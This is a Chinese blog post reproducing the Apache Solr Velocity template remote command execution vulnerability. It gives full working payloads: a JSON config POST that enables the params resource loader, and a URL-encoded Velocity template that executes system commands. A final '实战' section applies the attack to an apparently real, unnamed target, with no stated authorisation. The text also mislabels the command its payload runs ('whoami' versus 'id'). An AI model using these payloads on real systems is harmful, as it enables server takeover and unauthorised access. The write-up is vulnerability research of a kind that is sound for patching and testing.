Apache Solr远程命令执行漏洞复现+实战

最新推荐文章于 2023-08-09 15:05:19 发布
最新推荐文章于 2023-08-09 15:05:19 发布
阅读量1.5k 收藏
点赞数
分类专栏: Web安全 文章标签: apache solr 命令执行 实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cj_allen/article/details/107491298
版权

前言:

Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

漏洞原理:

该漏洞的产生是由于两方面的原因:

  1. 当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改。
  2. Apache Solr默认集成VelocityResponseWriter插件,在该插件的初始化参数中的params.resource.loader.enabled这个选项是用来控制是否允许参数资源加载器在Solr请求参数中指定模版,默认设置是false。当设置params.resource.loader.enabled为true时,将允许用户通过设置请求中的参数来指定相关资源的加载,这也就意味着攻击者可以通过构造一个具有威胁的攻击请求,在服务器上进行命令执行。

影响版本:

  • 包括且不限于8.2.0(最新版本)
  • 5.4.1/5.5.0
  • 6.6.1/6.6.3
  • 7.0.1/7.1.0/7.2.1/7.3.0/7.4.0/7.5.0/7.7.1/7.7.2
  • 8.1.0/8.1.1/8.2.0

漏洞复现:

windows环境+Solr
Solr下载地址:http://archive.apache.org/dist/lucene/solr/7.7.2/solr-7.7.2.zip
第一步:下载好Solr环境后,解压,进入到C:\Users\Administrator\Desktop\solr-7.7.2\bin目录中。
在该目录中打开cmd,输入命令

solr start

出现如图表示启动成功。
在这里插入图片描述
访问本机ip地址+端口8983 如图表示启动成功。
在这里插入图片描述
第二步:添加Core Selector查看集合,该漏洞利用前提条件是攻击者需要知道Solr服务中Core的名称才能执行攻击

在这里插入图片描述:此时直接添加是无法进行添加的,需要将C:\Users\Administrator\Desktop\solr-7.7.2\server\solr\configsets\_default目录下的conf文件夹复制到C:\Users\Administrator\Desktop\solr-7.7.2\server\solr\jimolang下。
在这里插入图片描述在这里插入图片描述
第三步:添加Core Selector,添加成功。
在这里插入图片描述
第四步:通过burp抓包修改请求为POST,修改/solr/jimolang/config配置文件。开启params.resource.loader.enabled

windows下踩坑情况,由于默认请求是get请求,当修改为post请求时需要添加参数体来开启params.resource.loader.enabled但是默认的请求类型是application/x-www-form-urlencoded此时如果直接提交是失败的,如下图所示:

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

在这里插入图片描述修改Content-Type:application/json后成功。(到了这一步已经成功开启params.resource.loader.enabled)为true
在这里插入图片描述
第五步:使用exp执行命令whoami

/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

在这里插入图片描述

实战:

访问目标地址:
在这里插入图片描述
burp抓包修改请求包为POST,并开启params.resource.loader.enabled为true,如图成功开启。
在这里插入图片描述

命令执行:whoami

在这里插入图片描述

zhzhzh777
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Solr 代码执行漏洞应急响应通告
05-05
Apache Solr 代码执行漏洞应急响应通告
黑客瞄准 Apache Solr 漏洞
Linuxprobe18的博客
03-14 983
导读2月底,黑客攻击了1400多台Apache Solr服务器来安装一个加密货币矿工软件。对Apache Solr服务器的攻击与1月份发生的一件事情类似,黑客利用未打补丁的Oracle WebLogic实例安装采矿设备来获得比特币替代品Monero。Apache Solr攻击者正在使用远程代码执行漏洞Apache软件基金会在10月份发布了一个修补漏洞的补丁。Solr是一个广泛使用的Apache程...
Apache Solrsolr-8.11.1.tgz)
01-10
Apache Solrsolr-8.11.1.tgz)Binary releases 二进制版本
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以使用各种不同类型的数据源来构造 Exploit1使用数据源的类型为URLDataSource Exploit2使用的数据源类型为ContentStreamDataSource 检测突破-Exploit1 Exploit1使用数据源的类型为URLDataSource 优点:结果回显支持对Solr低版本的检测 缺点:需要出网 步骤1 构造URLDataSource类型的数据源(Solr服务器会去访问该数据源!)可以直接使用这个 文档demo.xml即URLDataSource类型的数据源一份无害的正常XML文档 文档中只有一个item元素骑士实执行1次命令 也可以自己启动网络服务器托
apache漏洞汇总apache漏洞汇总
03-29
Apache-flink 未授权访问任意jar包上传反弹shell CVE-2019-0193 Apache-Solr via Velocity template RCE CVE-2019-17564 Apache-Dubbo反序列化漏洞 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 CVE-2020-13957 Apache Solr 未授权上传
Solr 4.7.2打补丁重新编译流程
dianquan8197的博客
08-24 312
下载.patch补丁文件:   https://issues.apache.org/jira/browse/SOLR-6969,选中补丁文件,右键【另存为】即可下载到本地。 下载solr4.7.2源码:   源码两种下载方式:     只下载solr-core:       1.进入https://mvnrepository.com/官网,搜索solr-core,选择相应版本...
漏洞Apache系列(二)之Solr漏洞
qq_45244158的博客
03-01 7237
漏洞Apache系列(二)之Solr漏洞
漏洞----5、Apache Solr远程命令执行漏洞(CVE-2019-0193)
七天
11-25 1274
文章目录一、Apache Solr 简介二、漏洞简介三、漏洞利用 一、Apache Solr 简介 Solr是基于Lucene的面向企业搜索的web应用,是一个独立的企业级搜索应用服务器。它对外提供类似于Web-service的API接口。 用户可以通过HTTP请求,向搜索引擎服务器提交一定格式的XML文件,生成索引; 也可以通过HTTP GET操作提出查找请求,并得到Xml/json格式的返回结果。 Apache Solr下载安装 二、漏洞简介 此次漏洞Apache Solr 的 DataI
Apache Solr 服务端请求伪造组合利用代码执行漏洞
whoami
04-17 385
Solr拥有出网条件下,有一个官方提供的一个正常功能接口,当requestDispatcher.requestParsers.enableRemoteStreaming参数远程设置为true后,可实http协议ssrf,netdoc协议目录遍历,file协议读取任意文件,jar协议注入tmp文件。当SolrSolrCloud模式启动时,攻击者可以通过构造恶意的solrconfig.xml文件,组合利用从而执行任意java代码。以 solrcloud 方式部署的机器不出网或添加Solr身份校验。
Solr反序列化远程代码执行漏洞(360训练平台)
FengZi_yu的博客
07-23 281
原理 Apache Solr中的ConfigAPI允许设置一个jmx.serviceUrl,它将创建一个新的JMXConnectorServerFactory,并通过“绑定”操作触发对目标RMI/LDAP服务器的调用。恶意的RMI服务器可以响应任意的对象,这些对象将在Solr端使用java的ObjectInputStream反序列化,这被认为是不安全的。这种类型的漏洞可以利用ysoserial工具。根据目标类路径,攻击者可以使用其中一个“gadget chain”来触发Solr端上的远程代码执行
Apache Solr High Performance.pdf&Solr;+In+Action+2013.pdf英文版
06-25
两本电子书,都是英文版本的。所以看清楚在下载。准备个字典
利用SOLR搭建企业搜索平台
u013244517的专栏
11-29 834
在网络上找了很多的关于solr的资料,发非常的不全面,即使就是官方的wiki,也是如此!   基于阶段正在研究的solr应用,陆续的会分享我的一些经验!   今天要说的是: 怎么跑起来!   1》 首先下载好solr,我用的是 solr1.3,下载地址:   windows版本   http://labs.xiaonei.com/apache-mirror/luc
漏洞Apache Solr 远程命令执行漏洞
weixin_42282189的博客
10-19 468
作者:r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 CVE-2017-12629 0x01 漏洞描述 Apache Solr 是一个基于Java语言利用HTTP&Apache Lucene 来实的开源的搜索服务器。原理是文档通过Http利用XML加到一个搜索集合中,查询是通过 http收到一个XML/JSON响应来进行查询操作。 0x02 影响版本 Apache Solr < 7.1 Apache Lucene < 7.1 0x03 测试环.
[CVE-2020-13957] Solr configset权限绕过漏洞
公众号shadow sock7
10-13 2557
影响版本 6.6.0 to 6.6.5 7.0.0 to 7.7.3 8.0.0 to 8.6.2 漏洞描述 本来Solr禁止一些可能造成RCE的危险操作通过ConfigSet这个API上传进行配置。但是可以通过结合UPLOAD/CREATE这两个ACTION来绕过这一限制。 原文 Solr prevents some features considered dangerous (which could be used for remote code execution) to be configur
Lucene聚类分组统计功能(grouping)
新哥依旧灿烂
09-18 1万+
在搜索的项目中,我们经常有对搜索结果进行分组或对字段进行压缩的需求。之前的文章提到这个功能已经添加到solr中并成为用户一个非常需要的特性。最近结果分组被作为一个扩展包加入到lucene3.1中,而在4.0中将直接作为一个模块。添加这个功能到lucene中使用起来将会更灵活。目前
solr漏洞合集
weixin_46626737的博客
07-02 707
在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)漏洞版本:Apache Solr 5.0.0 ~8.3.1。漏洞版本:Apache Solr < 8.2.0。3.solr远程代码执行(CVE-2017-12629)5.solr的XXE漏洞(CVE-2017-12629)2.solr远程代码执行(CVE-2019-0193)漏洞版本:Apache Solr < 7.1。漏洞版本:Apache Solr < 7.1。
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
weixin_44047654的博客
03-03 1519
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
Apache Solr漏洞总结(比较全面的哦)
热门推荐
yangbz123的博客
06-11 1万+
目录框架概述Wiki百科百度百科漏洞列表1.远程命令执行RCE(CVE-2017-12629)漏洞详情漏洞影响版本修方案2.远程命令执行XXE(CVE-2017-12629)漏洞详情漏洞影响版本修方案3.任意文件读取AND命令执行(CVE-2019-17558)漏洞详情漏洞3.1代码执行3.2任意文件读取影响版本修方案4.远程命令执行漏洞(CVE-2019-0192)漏洞详情漏洞影响版本修方案5.远程命令执行漏洞(CVE-2019-0193)漏洞详情漏洞影响版本修方案6.未授权
Apache Solr 未授权上传(RCE)漏洞(CVE-2020-13957)加固操作指南
乐大厨串串香飘万里
08-09 597
Apache Solr 未授权上传(RCE)漏洞(CVE-2020-13957)
apache solr 7升级
最新发布
12-22
Apache Solr是一款开源的搜索平台,其7版本升级带来了许多新特性和改进,使得用户能够更加高效地进行搜索和数据分析。升级到Apache Solr 7可以带来诸多好处。 首先,Solr 7提供了更好的性能和稳定性,通过优化搜索和索引速度,以及提高集群的吞吐量和并发性能,可以更好地满足大规模数据的搜索需求。同时,Solr 7还引入了基于时间的数据分析功能,可以更好地支持实时数据的处理和分析。 其次,Solr 7引入了新的查询语言和功能,包括布尔查询、近似查询、条件查询等,可以更加灵活地对数据进行搜索和过滤。同时,Solr 7还加强了对多语言和多字段搜索的支持,可以更好地满足不同语言和数据类型的搜索需求。 此外,Solr 7还提供了全新的管理界面和监控工具,可以更加方便地进行索引和集群的管理,以及实时监控集群状态和性能指标,有助于提高系统的可用性和稳定性。 总之,Apache Solr 7升级带来了更好的性能、更丰富的功能和更方便的管理工具,可以帮助用户更好地进行搜索和数据分析,提高系统的可用性和灵活性。因此,升级到Solr 7是非常值得的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值